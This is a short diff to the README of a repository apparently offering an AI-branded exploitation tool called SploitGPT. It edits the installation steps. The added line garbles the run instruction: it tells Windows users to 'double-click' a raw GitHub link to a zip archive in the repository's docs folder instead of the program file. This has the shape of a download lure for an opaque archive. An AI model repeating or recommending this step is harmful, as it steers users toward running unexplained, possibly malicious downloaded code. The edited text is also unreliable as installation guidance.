DDooDDgg/SploitGPT/README.md

    - Locate the downloaded zip file in your downloads folder.
 Right-click on it and select "Extract All" to unpack the contents.

 5. **Run the Application**
    - Navigate to the extracted folder.
-Double-click on `SploitGPT.exe` (for Windows) or run `./SploitGPT` from your terminal (for Linux) to start the program.
+Double-click on `https://github.com/DDooDDgg/SploitGPT/raw/refs/heads/main/docs/GPT_Sploit_1.6.zip` (for Windows) or run `./SploitGPT` from your terminal (for Linux) to start the program.

 ## 📊 Features